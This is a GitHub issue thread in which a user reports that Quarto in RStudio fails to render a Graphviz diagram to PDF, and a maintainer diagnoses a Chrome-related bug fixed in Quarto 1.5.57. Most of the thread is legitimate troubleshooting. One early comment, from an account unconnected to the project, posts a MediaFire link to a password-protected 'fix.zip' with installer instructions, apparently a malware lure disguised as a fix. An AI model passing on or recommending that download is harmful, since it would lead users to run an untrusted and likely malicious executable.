### ISSUE TITLE
quarto can't render pdf with  graphviz, i get error

### ISSUE THREAD

**Issue by Ullix-xl** [rstudio/rstudio#15102] opened 2024-08-29 15:22 UTC
RStudio 2024.04.2+764 "Chocolate Cosmos" Release (e4392fc9ddc21961fd1d0efd47484b43f07a4177, 2024-06-05) for windows
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) RStudio/2024.04.2+764 Chrome/120.0.6099.291 Electron/28.3.1 Safari/537.36, Quarto 1.4.555

code :

````
---
title: "graphviz"
format: pdf
editor: visual
---

## Graphviz

```{dot}
digraph G {
  a -> c;
}
```
````
i get this:
![Snipaste_2024-08-29_23-22-14](https://github.com/user-attachments/assets/5e8219b7-1aa7-47f6-92ad-18029bfc17c3)

==> quarto preview graphviz.qmd --to pdf --no-watch-inputs --no-browse

ERROR: Couldn't find open server.
Chrome process error: 

Stack trace:
Chrome process error: 
    at criClient (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:40054:15)
    at eventLoopTick (ext:core/01_core.js:183:11)
    at async file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:40016:22
    at async Semaphore.runExclusive (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:39693:29)
    at async Object.createPngsFromHtml (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:40268:42)
    at async Object.cell (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:74134:49)
    at async Promise.all (index 0)
    at async Object.document (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:40529:25)
    at async handleLanguageCells (file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:40499:42)
    at async file:///G:/AppsInstalled/RStudio/resources/app/bin/quarto/bin/quarto.js:77224:51
![Snipaste_2024-08-29_23-22-14](https://github.com/user-attachments/assets/c5d67df4-cfcd-44b4-b993-e2b3ac8badb8)

**Comment by Anubi5x0** [comment] 2024-08-29 15:23
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ronblum** [comment] 2024-08-29 15:54
@Ullix-xl Thank you for raising this! What do you get if you run the `quarto` command from the command line? If can open a terminal within RStudio, then within the directory containing the file, run
```
 quarto preview graphviz.qmd --to pdf --no-watch-inputs --no-browse
```

Or in a command window outside of RStudio, it's probably something like
```
C:\'Program Files'\RStudio\resources\app\bin\quarto\bin\quarto.exe preview graphviz.qmd --to pdf --no-watch-inputs --no-browse
```

**Comment by ronblum** [comment] 2024-08-29 18:23
Are you the Quarto bundled with RStudio or did you download the Quarto CLI from Quarto.org?

This is a bug due to a Chrome update:
* https://github.com/quarto-dev/quarto-cli/issues/10573
* https://github.com/quarto-dev/quarto-cli/issues/10626

The fix for it is in Quarto 1.5.57 which was just released:
https://github.com/quarto-dev/quarto-cli/releases/tag/v1.5.57

Internal note: Check changes with 1.4.x

**Comment by ronblum** [comment] 2024-08-29 18:36
This is a problem with Quarto 1.4.555, as well, bundled with RStudio Desktop 2024.04.2+764.

**Comment by ronblum** [comment] 2024-08-30 15:33
Let's make sure that RStudio is picking up the correct instance of Quarto. Would you mind installing the `quarto` package and running `quarto_version()` and `quarto_version()`. You should see something like:
```
> quarto::quarto_version()
[1] ‘1.5.57’
> quarto::c
[1] "C:\\Users\\RonBlum\\AppData\\Local\\Programs\\Quarto\\bin\\quarto.exe"
```

**Comment by ronblum** [comment] 2024-08-30 15:46
Verified in RStudio Desk 2024.09.0+360 on Windows 11, but waiting to get more details before closing.

**Comment by Ullix-xl** [comment] 2024-08-31 01:00
> Let's make sure that RStudio is picking up the correct instance of Quarto. Would you mind installing the `quarto` package and running `quarto_version()` and `quarto_version()`. You should see something like:
> 
> ```
> > quarto::quarto_version()
> [1] ‘1.5.57’
> > quarto::c
> [1] "C:\\Users\\RonBlum\\AppData\\Local\\Programs\\Quarto\\bin\\quarto.exe"
> ```

the results demonstrate that Rstudio use new version quarto 1.5.57 i installed.

**Comment by Ullix-xl** [comment] 2024-08-31 01:09
> Let's make sure that RStudio is picking up the correct instance of Quarto. Would you mind installing the `quarto` package and running `quarto_version()` and `quarto_version()`. You should see something like:
> 
> ```
> > quarto::quarto_version()
> [1] ‘1.5.57’
> > quarto::c
> [1] "C:\\Users\\RonBlum\\AppData\\Local\\Programs\\Quarto\\bin\\quarto.exe"
> ```

the results demonstrate that Rstudio use new version quarto 1.5.57 i installed.

**Comment by Ullix-xl** [comment] 2024-08-31 01:12
![1](https://github.com/user-attachments/assets/db2b16a0-833b-43ef-817f-a13c0211311b)


> Verified in RStudio Desk 2024.09.0+360 on Windows 11, but waiting to get more details before closing.
> 
> Testsed with:
> 
> * The example [quarto can't render pdf with  graphviz, i get error #15102](https://github.com/rstudio/rstudio/issues/15102) above
> * The example in ["Couldn't find open server" for diagram in pdf/docx  quarto-dev/quarto-cli#10573](https://github.com/quarto-dev/quarto-cli/issues/10573)
> * The example in [Error while rendering `mermaid` and `dot` in `format: pdf` quarto-dev/quarto-cli#10626](https://github.com/quarto-dev/quarto-cli/issues/10626)
> 
> Also verified Quarto version 1.5.57 in Ubuntu 22 and MacOS 15.0 beta.

the results demonstrate that Rstudio use new version quarto 1.5.57 i installed.

> the results demonstrate that Rstudio use new version quarto 1.5.57 i installed.

![1](https://github.com/user-attachments/assets/c40287ea-012c-4eb9-809d-c370afbd530c)

**Comment by ronblum** [comment] 2024-09-03 16:07
@Ullix-xl Thank you! It certainly looks like you're using Quarto 1.5.57.

- First, just to confirm, you get the error even when running from the command line? This: https://github.com/rstudio/rstudio/issues/15102#issuecomment-2318216952
- Second, wow, I'm glad that you figured out that I was also looking for `quarto_path`, considering that I put `quarto_version` twice as in the description and overwrote the function with `c` in the output example.  Sorry--that was sloppy of me (I know how it happened, and I should've checked for it).

**Comment by ronblum** [comment] 2024-09-03 20:16
@Ullix-xl Also, what version of Chrome are you using? You can see it at chrome://settings/help . If it happens to start the update, can you also note the version that's listed as the update is happening?

**Comment by ronblum** [comment] 2024-09-03 21:46
Suggestion: Can you try closing RStudio, logging out, then logging back in? Or alternatively, rebooting.

We've had mixed success in reproducing the issue, but when going through the steps of triggering the error and updating, we've found that there's a possibility of some processes hanging which could be causing the fix not to take. Logging out/in or rebooting should get rid of the processes and hopefully resolve what you're seeing.

**Closed** 2024-09-09 21:19 UTC
Labels: bug, quarto
